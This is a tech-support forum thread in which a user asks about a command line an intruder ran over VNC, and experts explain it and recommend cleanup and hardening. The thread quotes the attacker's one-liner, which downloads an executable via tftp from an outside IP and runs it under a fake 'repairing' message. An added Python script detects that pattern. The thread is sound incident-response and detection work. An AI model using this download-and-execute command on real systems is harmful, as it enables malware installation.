Solved

What is this cmdline attempting to do?

Posted on 2007-11-27
8
300 Views
Last Modified: 2013-11-16
Hi,

We recently had a PC hacked via Real VNC. The hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done?

Regards

Rob
0
Question by:ertnev74
8 Comments
 
LVL 40

Accepted Solution

by:
Richard Quadling earned 350 total points
ID: 20357105
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%

At the DOS prompt, type SET and press Enter and you will see COMSPEC.
Normally cmd.exe or (older Windows) command.com.


/c

Tells the comspec to run a command and then quit.


echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

Output to the screen.



tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address of 81.88.110.178


start cffhvvct

Run the program just downloaded.




If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timed out.

If it was a virus, then the site may have been blocked or something else.
0
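As an added example for this thread (not code from the original post or from any of the answers), the following Python script does mechanically what the answer above does by hand: it expands %VAR% references from a supplied environment, splits the cmd.exe chain on its separators (honouring quotes and the ^ escape), and flags the download-then-execute pattern that turns two harmless-looking commands into a compromise. The environment dictionary is a constructed stand-in for the victim's SET output; the command line itself is the one quoted in the question.

```python
"""Triage a cmd.exe one-liner: expand %VAR%, split the & chain, flag download-and-execute."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# The command line quoted in the question above.
ATTACKER_CMDLINE = ("%comspec% /c echo Repairing user32.dll & echo Please wait... "
                    "& tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&")

# Constructed stand-in for the victim's SET output (an assumption, not from the thread).
# cmd.exe looks variable names up case-insensitively, so keys are stored upper-case.
SAMPLE_ENV = {"COMSPEC": r"C:\WINDOWS\system32\cmd.exe"}

SEPARATORS = ("&&", "||", "&", "|")  # longest first, so && is not read as two &


def expand_vars(cmdline: str, env: dict[str, str]) -> str:
    """Replace %NAME% references as the shell does before running the line."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), cmdline)


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe line into its individual commands.

    Double quotes and the ^ escape are honoured, so a quoted or escaped & is
    kept as data.  A trailing & (as in the question) yields an empty last
    command, which is dropped.
    """
    parts, buf, i, in_quotes = [], [], 0, False
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "^" and not in_quotes and i + 1 < len(cmdline):
            buf.append(cmdline[i + 1])       # ^X means a literal X
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        sep = None if in_quotes else next((s for s in SEPARATORS if cmdline.startswith(s, i)), None)
        if sep:
            parts.append("".join(buf).strip())
            buf = []
            i += len(sep)
            continue
        buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def _stem(name: str) -> str:
    """Lower-case file name without directory or .exe, for loose matching."""
    base = re.split(r"[\\/]", name)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


@dataclass
class Triage:
    shell: str | None = None                    # interpreter named by %COMSPEC%, if any
    commands: list[str] = field(default_factory=list)
    downloads: list[tuple[str, str, str]] = field(default_factory=list)  # (tool, host, local file)
    executed: list[str] = field(default_factory=list)
    findings: list[str] = field(default_factory=list)


def triage_cmdline(cmdline: str, env: dict[str, str] | None = None) -> Triage:
    """Expand, split and classify a cmd.exe one-liner; returns the indicators found."""
    env = SAMPLE_ENV if env is None else env
    t = Triage()
    line = expand_vars(cmdline, env).strip()
    head = line.split(None, 2)
    # "<cmd.exe> /c <chain>": the chain is what the spawned shell actually runs
    if len(head) >= 2 and _stem(head[0]) in ("cmd", "command") and head[1].lower() == "/c":
        t.shell = head[0]
        line = head[2] if len(head) == 3 else ""
    t.commands = split_chain(line)

    for cmd in t.commands:
        argv = cmd.split()
        prog, args = _stem(argv[0]), argv[1:]
        if prog == "tftp":
            # tftp [-i] host [GET | PUT] source [destination]
            positional = [a for a in args if not a.startswith("-")]
            if len(positional) >= 3 and positional[1].upper() == "GET":
                local = positional[3] if len(positional) > 3 else positional[2]
                t.downloads.append(("tftp", positional[0], local))
                t.findings.append(f"binary download from {positional[0]} via tftp -> {local}")
        elif prog == "start":
            # start ["title"] [/options] program: the first plain argument is the program
            target = next((a for a in args if not a.startswith(("/", '"'))), None)
            if target:
                t.executed.append(target)
        elif prog in {_stem(f) for _, _, f in t.downloads}:
            t.executed.append(argv[0])          # downloaded file run directly by name

    fetched = {_stem(f) for _, _, f in t.downloads}
    t.findings.extend(f"executes the downloaded file: {x}" for x in t.executed if _stem(x) in fetched)
    return t


if __name__ == "__main__":
    result = triage_cmdline(ATTACKER_CMDLINE)
    print("shell   :", result.shell)
    for c in result.commands:
        print("command :", c)
    for f in result.findings:
        print("FINDING :", f)
```

Run as-is it reports the shell that %COMSPEC% resolved to, the four chained commands, and two findings: a binary fetched over TFTP from 81.88.110.178 and that same file being started. The echo lines are deliberately left unflagged; they exist only to reassure whoever is watching the screen, which is exactly why a detection should key on the tftp GET followed by a start of the fetched name rather than on the visible text.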
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 100 total points
ID: 20357113
Dear ertnev74,

A few weeks ago I got the same issue via VNC; it basically tries to dump 1.exe or 2.exe, which is a trojan. Basically, search the computer for viruses and try to search for 1.exe.

You can manually end the process, rename it and later delete it.

Run good antivirus software like Windows Live Care or E-Wido.

Read some more info
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
0
 
LVL 40

Assisted Solution

by:Richard Quadling
Richard Quadling earned 350 total points
ID: 20357123
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the PC from the LAN and running virus scanners and rootkit scanners.

Sysinternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
Sysinternals RootkitRevealer (to see if any rootkits exist).
Sysinternals Autoruns (to see what is launched when the computer is turned on or when you log in).
HijackThis is a similar program to AutoRuns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php)
0
 
LVL 47

Assisted Solution

by:rpggamergirl
rpggamergirl earned 50 total points
ID: 20357538
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware,
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
0
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 100 total points
ID: 20357582
Sorry, I forgot to mention: always make sure that your firewall is turned on.
Or VNC should only be enabled as and when required.
If you can change the default port, i.e. 5900, to some other port, that would be helpful too, as this port is well known to hackers, so they just scan the port and enter through it.
I need this same thing with our guys and it solved my problem.

Now, since the program has been executed on your machine, better do a virus/spyware/trojan scan and then do the needful as above.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20357691
So what's the problem? Were you able to find 1.exe?
0
 

Author Comment

by:ertnev74
ID: 20358036
All, thanks for your assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.

I looked up 'VNC being hacked' on EE and found a few solutions to rectify the situation. Once I made the box secure by running Spyware / AV / Process Scanners, I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV Scan removed a few trojans and viruses so I'm not too sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20359640
Thanks for the valuable feedback. The best is to keep your Windows firewall ON and keep Windows patched!!!!
0
